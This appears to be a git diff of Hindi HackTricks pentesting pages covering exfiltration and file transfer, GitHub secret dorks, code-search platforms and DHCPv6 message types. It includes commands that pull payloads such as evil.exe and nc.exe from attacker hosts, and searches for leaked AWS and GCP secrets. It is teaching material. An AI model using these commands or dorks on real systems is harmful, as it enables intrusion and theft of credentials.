## **SMTP**
|
||||
|
||||
यदि आप एक SMTP सर्वर को डेटा भेज सकते हैं, तो आप Python के साथ डेटा प्राप्त करने के लिए एक SMTP बना सकते हैं:
|
||||
यदि आप एक SMTP सर्वर को डेटा भेज सकते हैं, तो आप पायथन के साथ डेटा प्राप्त करने के लिए एक SMTP बना सकते हैं:
|
||||
```bash
|
||||
sudo python -m smtpd -n -c DebuggingServer :25
|
||||
```
|
||||
|
@ -290,13 +275,11 @@ tftp -i <KALI-IP> get nc.exe
|
|||
```
|
||||
## PHP
|
||||
|
||||
PHP के एक लाइनर के साथ एक फ़ाइल डाउनलोड करें:
|
||||
PHP वनलाइनर के साथ एक फ़ाइल डाउनलोड करें:
|
||||
```bash
|
||||
echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php
|
||||
```
|
||||
## VBScript
|
||||
|
||||
VBScript का उपयोग डेटा अन्य संगठनों में भेजने के लिए किया जा सकता है। VBScript को उपयोग करके डेटा को एक फ़ाइल में लिखा जा सकता है और फिर उस फ़ाइल को एक विदेशी सर्वर पर अपलोड किया जा सकता है।
|
||||
```bash
|
||||
Attacker> python -m SimpleHTTPServer 80
|
||||
```
|
||||
|
@ -334,7 +317,7 @@ cscript wget.vbs http://10.11.0.5/evil.exe evil.exe
|
|||
```
|
||||
## डीबग.एक्सई
|
||||
|
||||
`डीबग.एक्सई` प्रोग्राम न केवल बाइनरी की जांच की अनुमति देता है बल्कि **हेक्स से उन्हें पुनः निर्माण करने की क्षमता भी है**। इसका मतलब है कि एक बाइनरी के हेक्स प्रदान करके, `डीबग.एक्सई` बाइनरी फ़ाइल उत्पन्न कर सकता है। हालांकि, यह महत्वपूर्ण है कि डीबग.एक्सई का एक **सीमितांकन है जो 64 केबी बाइट के फ़ाइलों को एकत्रित करने की सीमा है**।
|
||||
`डीबग.एक्सई` प्रोग्राम न केवल बाइनरी की जांच की अनुमति देता है बल्कि **हेक्स से उन्हें पुनः निर्माण करने की क्षमता भी है**। इसका मतलब है कि एक बाइनरी के हेक्स प्रदान करके, `डीबग.एक्सई` बाइनरी फ़ाइल उत्पन्न कर सकता है। हालांकि, यह महत्वपूर्ण है कि डीबग.एक्सई का एक **सीमितांकन है जो 64 केबी के आकार तक फ़ाइलों को आसेंबल करने की है**।
|
||||
```bash
|
||||
# Reduce the size
|
||||
upx -9 nc.exe
|
||||
|
@ -346,20 +329,21 @@ wine exe2bat.exe nc.exe nc.txt
|
|||
|
||||
**Try Hard Security Group**
|
||||
|
||||
<figure><img src="../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://discord.gg/tryhardsecurity" %}
|
||||
|
||||
{% hint style="success" %}
|
||||
**AWS हैकिंग सीखें और प्रैक्टिस करें:** [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
|
||||
**GCP हैकिंग सीखें और प्रैक्टिस करें:** [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
दूसरे तरीके HackTricks का समर्थन करने के लिए:
|
||||
|
||||
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* प्राप्त करें [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com)
|
||||
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **जुड़ें** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** और **हैकट्रिक्स क्लाउड** github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,31 +1,32 @@
|
|||
# गिथब डोर्क्स और लीक्स
|
||||
# Github डोर्क्स और लीक्स
|
||||
|
||||
{% hint style="success" %}
|
||||
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert) के साथ</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें** द्वारा **पीआर जमा करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) गिथब रेपो में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **जुड़ें** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
<img src="../../.gitbook/assets/i3.png" alt="" data-size="original">\
|
||||
**बग बाउंटी टिप**: **साइन अप करें** इंटिग्रिटी के लिए, एक प्रीमियम **बग बाउंटी प्लेटफॉर्म जो हैकर्स द्वारा बनाया गया है**! आज हमारे साथ शामिल हों [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) और शुरू करें बाउंटी अप टू **$100,000** तक कमाना!
|
||||
**बग बाउंटी टिप**: **Intigriti** के लिए **साइन अप** करें, एक प्रीमियम **बग बाउंटी प्लेटफॉर्म जो हैकर्स द्वारा बनाई गई है**! आज हमारे साथ शामिल हों [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) और शुरू करें बाउंटी अप तक **$100,000** तक कमाना!
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
|
||||
अब जब हमने हमारे स्कोप की संपत्तियों की सूची बना ली है, तो समय है कुछ OSINT लो-हैंगिंग फलों की खोज करने का।
|
||||
अब जब हमने हमारे स्कोप की संपत्तियों की सूची बना ली है, तो अब समय है कुछ OSINT लो-हैंगिंग फलों की खोज करने का।
|
||||
|
||||
### लीक्स के लिए पहले से खोजने वाले प्लेटफॉर्म
|
||||
### लीक्स के लिए पहले से खोजे जाने वाले प्लेटफॉर्म
|
||||
|
||||
* [https://trufflesecurity.com/blog/introducing-forager/](https://trufflesecurity.com/blog/introducing-forager/)
|
||||
|
||||
### गिथब में एपीआई कुंजी लीक्स
|
||||
### गिटहब में एपीआई कुंजी लीक्स
|
||||
|
||||
* [https://github.com/dxa4481/truffleHog](https://github.com/dxa4481/truffleHog)
|
||||
* [https://github.com/gitleaks/gitleaks](https://github.com/gitleaks/gitleaks)
|
||||
|
@ -321,16 +322,17 @@ GCP SECRET
|
|||
AWS SECRET
|
||||
"private" extension:pgp
|
||||
```
|
||||
{% hint style="success" %}
|
||||
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
दूसरे तरीके HackTricks का समर्थन करने के लिए:
|
||||
|
||||
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **Twitter** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,57 +1,59 @@
|
|||
# Wide Source Code Search
|
||||
# व्यापक स्रोत कोड खोज
|
||||
|
||||
{% hint style="success" %}
|
||||
AWS हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a> <strong>के साथ!</strong></summary>
|
||||
<summary>HackTricks का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, यानी [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)\*\* पर फॉलो\*\* करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें और PRs सबमिट करें** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
**Try Hard सुरक्षा समूह**
|
||||
|
||||
<figure><img src="https://github.com/carlospolop/hacktricks/blob/in/generic-methodologies-and-resources/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://discord.gg/tryhardsecurity" %}
|
||||
|
||||
***
|
||||
|
||||
इस पृष्ठ का उद्देश्य है **प्लेटफॉर्मों की सूची बनाना जो हजारों/लाखों रेपो में कोड (शब्दांश या रीजेक्स) खोजने की अनुमति देती हैं**।
|
||||
इस पृष्ठ का उद्देश्य है **प्लेटफॉर्मों की सूची बनाना जो कोड खोजने की अनुमति देती हैं** (शब्दांश या रेजेक्स) हजारों/लाखों रेपो में एक या अधिक प्लेटफॉर्मों पर।
|
||||
|
||||
यह कई अवसरों में मदद करता है **लीक हुई जानकारी** या **सुरक्षा दोष** पैटर्न्स की खोज करने में।
|
||||
यह कई अवसरों में मदद करता है **लीक हुई जानकारी** या **कमजोरियों** के पैटर्न खोजने में।
|
||||
|
||||
* [**SourceGraph**](https://sourcegraph.com/search): मिलियनों रेपो में खोजें। एक मुफ्त संस्करण और एक एंटरप्राइज संस्करण (15 दिन की मुफ्त सेवा) है। यह रीजेक्स समर्थित करता है।
|
||||
* [**Github खोज**](https://github.com/search): Github में खोजें। यह रीजेक्स समर्थित करता है।
|
||||
* [**SourceGraph**](https://sourcegraph.com/search): मिलियनों रेपो में खोजें। एक मुफ्त संस्करण और एक एंटरप्राइज संस्करण (15 दिन का मुफ्त) है। यह रेजेक्स समर्थित करता है।
|
||||
* [**Github खोज**](https://github.com/search): Github में खोजें। यह रेजेक्स समर्थित करता है।
|
||||
* शायद यह उपयोगी हो सकता है [**Github कोड खोज**](https://cs.github.com/) भी देखना।
|
||||
* [**Gitlab उन्नत खोज**](https://docs.gitlab.com/ee/user/search/advanced\_search.html): Gitlab परियोजनाओं में खोजें। रीजेक्स समर्थित करता है।
|
||||
* [**Gitlab उन्नत खोज**](https://docs.gitlab.com/ee/user/search/advanced\_search.html): Gitlab परियोजनाओं में खोजें। रेजेक्स समर्थित है।
|
||||
* [**SearchCode**](https://searchcode.com/): लाखों परियोजनाओं में कोड खोजें।
|
||||
|
||||
{% hint style="warning" %}
|
||||
जब आप किसी रेपो में लीक खोजते हैं और `git log -p` जैसी कुछ चलाते हैं, तो याद रखें कि **अन्य शाखाओं में अन्य कमिट्स** भी सीक्रेट्स को समेत सकते हैं!
|
||||
जब आप किसी रेपो में लीक खोजते हैं और `git log -p` जैसी कुछ चलाते हैं, तो याद रखें कि **अन्य शाखाएं भी हो सकती हैं जिनमें अन्य कमिट्स** जो सीक्रेट्स रखते हैं!
|
||||
{% endhint %}
|
||||
|
||||
**Try Hard सुरक्षा समूह**
|
||||
|
||||
<figure><img src="https://github.com/carlospolop/hacktricks/blob/in/generic-methodologies-and-resources/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://discord.gg/tryhardsecurity" %}
|
||||
|
||||
{% hint style="success" %}
|
||||
AWS हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a> <strong>के साथ!</strong></summary>
|
||||
<summary>HackTricks का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, यानी [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)\*\* पर फॉलो\*\* करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें और PRs सबमिट करें** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,19 +1,20 @@
|
|||
{% hint style="success" %}
|
||||
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>HackTricks का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* अगर आप चाहते हैं कि **आपकी कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
### DHCPv6 vs. DHCPv4 संदेश प्रकार तुलना
|
||||
DHCPv6 और DHCPv4 संदेश प्रकारों की तुलनात्मक दृश्य नीचे दिए गए तालिका में प्रस्तुत किया गया है:
|
||||
नीचे दिए गए तालिका में DHCPv6 और DHCPv4 संदेश प्रकारों की तुलनात्मक दृश्य प्रस्तुत किया गया है:
|
||||
|
||||
| DHCPv6 संदेश प्रकार | DHCPv4 संदेश प्रकार |
|
||||
|:-------------------|:-------------------|
|
||||
|
@ -31,33 +32,34 @@ DHCPv6 और DHCPv4 संदेश प्रकारों की तुल
|
|||
**DHCPv6 संदेश प्रकारों का विस्तृत विवरण:**
|
||||
|
||||
1. **Solicit (1)**: DHCPv6 क्लाइंट द्वारा उपलब्ध सर्वरों को खोजने के लिए प्रारंभिक।
|
||||
2. **Advertise (2)**: Solicit का प्रतिसाद में सर्वरों द्वारा भेजा गया, DHCP सेवा के लिए उपलब्धता को सूचित करता है।
|
||||
2. **Advertise (2)**: Solicit का प्रतिसाद में सर्वरों द्वारा भेजा गया, DHCP सेवा के लिए उपलब्धता को दर्शाता है।
|
||||
3. **Request (3)**: ग्राहक इसका उपयोग विशिष्ट सर्वर से IP पते या प्रिफिक्स का अनुरोध करने के लिए करते हैं।
|
||||
4. **Confirm (4)**: एक ग्राहक द्वारा उनके द्वारा नेटवर्क पर अभिगमन किए गए पतों की वैधता की पुष्टि करने के लिए उपयोग किया जाता है, सामान्यत: नेटवर्क परिवर्तन के बाद।
|
||||
4. **Confirm (4)**: ग्राहक द्वारा उन्हें सौंपे गए पते अब भी नेटवर्क पर वैध हैं या नहीं यह सत्यापित करने के लिए उपयोग किया जाता है, आमतौर पर नेटवर्क परिवर्तन के बाद।
|
||||
5. **Renew (5)**: ग्राहक मूल सर्वर को पते की अवधि बढ़ाने या विन्यास अपडेट करने के लिए इसे भेजते हैं।
|
||||
6. **Rebind (6)**: किसी भी सर्वर को पते की अवधि बढ़ाने या विन्यास अपडेट करने के लिए भेजा जाता है, विशेष रूप से जब कोई प्रतिक्रिया नहीं मिलती है एक नवीनीकरण के बाद।
|
||||
7. **Reply (7)**: सर्वर इसका उपयोग करते हैं ताकि पते, विन्यास पैरामीटर, या रिलीज या डिक्लाइन जैसे संदेशों की पुष्टि करें।
|
||||
8. **Release (8)**: ग्राहक सर्वर को एक या एक से अधिक निर्धारित पतों का उपयोग बंद करने की सूचना देते हैं।
|
||||
9. **Decline (9)**: ग्राहक द्वारा भेजा गया है कि नेटवर्क पर निर्धारित पते संघर्ष में हैं।
|
||||
10. **Reconfigure (10)**: सर्वर ग्राहकों को नए या अपडेट किए गए विन्यास के लिए लेन-देन आरंभ करने के लिए प्रोत्साहित करते हैं।
|
||||
11. **Information-Request (11)**: ग्राहक आईपी पता निर्धारण के बिना विन्यास पैरामीटर अनुरोध करते हैं।
|
||||
6. **Rebind (6)**: किसी भी सर्वर को पते की अवधि बढ़ाने या विन्यास अपडेट करने के लिए भेजा जाता है, विशेष रूप से जब कोई प्रतिक्रिया नहीं मिलती है एक रिन्यू को।
|
||||
7. **Reply (7)**: सर्वर इसका उपयोग करते हैं ताकि पते, विन्यास पैरामीटर या रिलीज या डिक्लाइन जैसे संदेशों को स्वीकृति देने के लिए प्रदान करें।
|
||||
8. **Release (8)**: ग्राहक सर्वर को एक या एक से अधिक सौंपे गए पतों का उपयोग बंद करने की सूचना देते हैं।
|
||||
9. **Decline (9)**: ग्राहक द्वारा रिपोर्ट किया जाता है कि नेटवर्क पर सौंपे गए पते संघर्ष में हैं।
|
||||
10. **Reconfigure (10)**: सर्वर ग्राहकों को नए या अपडेटेड विन्यास के लिए लेनदेन आरंभ करने के लिए प्रोत्साहित करते हैं।
|
||||
11. **Information-Request (11)**: ग्राहक आईपी पता सौंपन के बिना विन्यास पैरामीटर अनुरोध करते हैं।
|
||||
12. **Relay-Forw (12)**: रिले एजेंट संदेशों को सर्वरों को आगे भेजते हैं।
|
||||
13. **Relay-Repl (13)**: सर्वर रिले एजेंट्स को उत्तर देते हैं, जो फिर मैसेज को ग्राहक को पहुंचाते हैं।
|
||||
13. **Relay-Repl (13)**: सर्वर रिले एजेंट्स को जवाब देते हैं, जो फिर मैसेज को ग्राहक को पहुंचाते हैं।
|
||||
|
||||
## संदर्भ
|
||||
* [https://support.huawei.com/enterprise/en/doc/EDOC1100306163/d427e938/introduction-to-dhcpv6-messages](https://support.huawei.com/enterprise/en/doc/EDOC1100306163/d427e938/introduction-to-dhcpv6-messages)
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>HackTricks का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
